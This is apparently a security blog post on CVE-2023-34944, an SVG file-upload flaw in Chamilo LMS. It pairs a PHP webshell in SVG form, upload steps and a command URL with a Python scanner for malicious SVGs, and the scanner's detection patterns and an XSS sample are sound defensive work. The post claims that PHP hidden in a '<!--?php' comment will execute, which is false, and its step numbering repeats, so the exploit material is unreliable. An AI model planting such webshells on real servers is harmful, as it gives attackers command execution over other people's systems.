In early 2023, security researchers uncovered a major vulnerability in Chamilo LMS (Learning Management System) — one that lets attackers upload and run their own code on a live server. This flaw, tracked as CVE-2023-34944, is found in the /fileUpload.lib.php component of Chamilo versions 1.11.* up to v1.11.18. In simple terms: if you’re running any affected Chamilo instance, someone could take over your web server using a malicious SVG file.

Let’s break down how this works, with simple language, code snippets, and clear instructions you can follow. This post is written for readers who want to understand both the risk and the method behind this vulnerability, whether you’re defending your servers or simply curious.

Why This Vulnerability Matters

Chamilo is a popular open-source platform for e-learning. Schools, universities, and companies use it to share materials and manage online courses. The vulnerability sits in the part of the application responsible for file uploads.

Letting users upload files is always risky. You need to check if uploaded files are safe: images should be images, not scripts, etc. In this case, Chamilo failed this basic check, leaving the door wide open.

Vulnerable Component

The problem lives in the /fileUpload.lib.php file, used every time someone uploads a file to the Chamilo system.

What’s the Issue?

Chamilo tries to restrict which file types you can upload. It checks the file extension (like .jpg, .png, .svg) and some content, but it doesn’t fully check the true contents of SVG files.

SVGs are images, but they’re really just text files containing XML. And XML can have embedded scripts—sometimes even PHP code. This allows for sneaky uploads.

The Exploit: Step-by-Step

1. Attacker prepares a malicious SVG file containing embedded code (either JavaScript for XSS, or, more dangerously, PHP code for server-side execution).

2. Chamilo saves the SVG in a public directory, thinking it's harmless.

3. Attacker visits the SVG file directly, and if the server processes .svg files with PHP (possible due to misconfiguration or intended legacy support), the attacker’s code runs.

Example: Crafting a Malicious SVG File

Let’s create a PHP shell inside an SVG. This is a classic method to “hide” code in a seemingly innocent image.

<!-- shell.svg -->
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="100" height="100"
     xmlns="http://www.w3.org/2000/svg" version="1.1">
    <rect width="100" height="100" style="fill:rgb(0,0,255);" />
    <!--?php system($_GET['cmd']); ?-->
</svg>

In the above, the line <!--?php system($_GET['cmd']); ?--> will be ignored by a browser, but if the server is set to process PHP in SVG files (which is bad practice, but not uncommon in shared hosting and some misconfigured servers), this will be interpreted as PHP.

Note on Modern Attacks

Even if PHP execution is blocked, attackers can embed JavaScript inside SVGs for browser exploitation (XSS), or use the SVG to initiate further attacks.

3. Upload your crafted shell.svg.

4. Go to the URL where Chamilo stores uploaded documents (often /app/upload/youruserfolder/shell.svg).

How To Access The Webshell

If PHP execution is enabled for SVGs (or if you find a way to get server-side code execution), you can visit:

https://YOUR-CHAMILO-SITE/app/upload/youruserfolder/shell.svg?cmd=whoami

The whoami command will run on the server, and the output will appear in your browser.

Defensive Tips

1. Upgrade Now: Chamilo fixed this in version 1.11.19 and above, with extra checks in fileUpload.lib.php (see the official GitHub commit in the references below).
2. Never Allow PHP Processing on Uploaded SVGs: Adjust your webserver (Apache or Nginx) so that nothing in the uploads directory is handed to the PHP interpreter, whatever its extension, SVGs included.
3. Scan and Remove Untrusted Files: Regularly audit uploads for suspicious files containing PHP or JavaScript.
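As an added example for tip 3 (this is not Chamilo's code, and not the fix the project shipped in 1.11.19), here is a content-aware SVG screening routine in Python that a defender can run over an uploads directory or adapt into an upload filter. It deliberately makes two passes: a raw byte scan, which sees comments and processing instructions, and an XML-parse pass, which sees elements and attributes. The three SVG samples are constructed for this example; the first carries the comment-wrapped PHP from the shell.svg example above, and running both passes on it shows why an XML-parser-only check would wave it through: the parser throws comments away, so only the byte scan notices it.

```python
"""Content-aware screening of SVG uploads (added example, not Chamilo code)."""
import re
import sys
import xml.etree.ElementTree as ET

# Constructed samples for this example (not files taken from the advisory).
# 1) PHP wrapped in an XML comment, the shape shown in shell.svg above.
SVG_PHP_IN_COMMENT = b"""<?xml version="1.0" standalone="no"?>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100" version="1.1">
  <rect width="100" height="100" style="fill:rgb(0,0,255);" />
  <!--?php system($_GET['cmd']); ?-->
</svg>"""

# 2) Browser-side payload: an event handler attribute plus an inline script.
SVG_WITH_SCRIPT = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">
  <script>alert(document.cookie)</script>
</svg>"""

# 3) A plain image that should be accepted.
SVG_CLEAN = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <circle cx="5" cy="5" r="4" fill="green"/>
</svg>"""

# Pass 1: byte-level patterns over the raw upload. These see everything an XML
# parser discards (comments, processing instructions, CDATA), which is exactly
# where the shell.svg trick hides its payload.
RAW_PATTERNS = {
    "php-open-tag": re.compile(rb"<\?(?:php\b|=)", re.I),     # <?php or <?=
    "php-in-comment": re.compile(rb"<!--\s*\?php\b", re.I),   # <!--?php ... ?-->
    "script-element": re.compile(rb"<script\b", re.I),
    "event-handler": re.compile(rb"\son[a-z]+\s*=", re.I),    # onload=, onclick=
    "javascript-url": re.compile(rb"javascript\s*:", re.I),
}


def scan_raw(data: bytes) -> list:
    """Names of every RAW_PATTERN that occurs anywhere in the bytes."""
    return [name for name, pat in RAW_PATTERNS.items() if pat.search(data)]


def local_name(qualified: str) -> str:
    """Strip an ElementTree '{namespace}' prefix and lower-case the name."""
    return qualified.rsplit("}", 1)[-1].lower()


def scan_parsed(data: bytes) -> list:
    """Parse as XML and flag risky elements/attributes.

    Note the gap this pass has on its own: ElementTree drops comments, so the
    comment-wrapped PHP in SVG_PHP_IN_COMMENT is invisible here.
    """
    findings = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["not-well-formed-xml"]
    if local_name(root.tag) != "svg":
        findings.append("root-not-svg")
    for el in root.iter():
        tag = local_name(el.tag)
        if tag in ("script", "foreignobject"):
            findings.append("element:" + tag)
        for attr, value in el.attrib.items():
            name = local_name(attr)
            if name.startswith("on"):
                findings.append("attr:" + name)
            elif name == "href" and value.strip().lower().startswith("javascript:"):
                findings.append("attr:href=javascript")
    return findings


def is_acceptable_svg(data: bytes) -> bool:
    """Accept only when both passes come back empty."""
    return not scan_raw(data) and not scan_parsed(data)


def audit_files(paths) -> dict:
    """Audit helper for an uploads directory: path -> combined findings."""
    report = {}
    for path in paths:
        with open(path, "rb") as fh:
            data = fh.read()
        report[path] = scan_raw(data) + scan_parsed(data)
    return report


if __name__ == "__main__":
    samples = {"php-in-comment": SVG_PHP_IN_COMMENT,
               "script": SVG_WITH_SCRIPT, "clean": SVG_CLEAN}
    for label, data in samples.items():
        print(label, "raw:", scan_raw(data), "parsed:", scan_parsed(data),
              "accept:", is_acceptable_svg(data))
    # Pass real paths on the command line to audit an uploads directory.
    if len(sys.argv) > 1:
        for path, findings in audit_files(sys.argv[1:]).items():
            print(path, findings or "ok")
```

Run it with no arguments to see the three samples classified, or pass the files under your uploads directory (for example the output of a find over app/upload) to get a per-file report. Both passes matter: the byte scan alone would miss a risky element hidden behind an unusual namespace prefix, while the parser alone never sees the commented-out PHP, which is the whole point of the shell.svg trick.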

References & Further Reading

- Chamilo Security Advisory (GitHub)
- CVE Details: CVE-2023-34944
- Original Commit Fixing the Flaw
- Detailed Exploit Write-up by Romain Bourgue

Conclusion

CVE-2023-34944 is a classic example of why validating file uploads is critical. This flaw in Chamilo LMS allowed easy attacks through crafted SVGs—letting attackers take control with minimal effort. If you use Chamilo, update now, lock down your upload directories, and always treat user files with suspicion.

Stay safe, and keep your learning environments secure!


Exclusive Note: This post is for educational and defensive security purposes only. Do not exploit live systems without proper permission. If you run Chamilo, patch immediately!

Timeline

Published on: 06/13/2023 21:15:00 UTC
Last modified on: 06/20/2023 17:15:00 UTC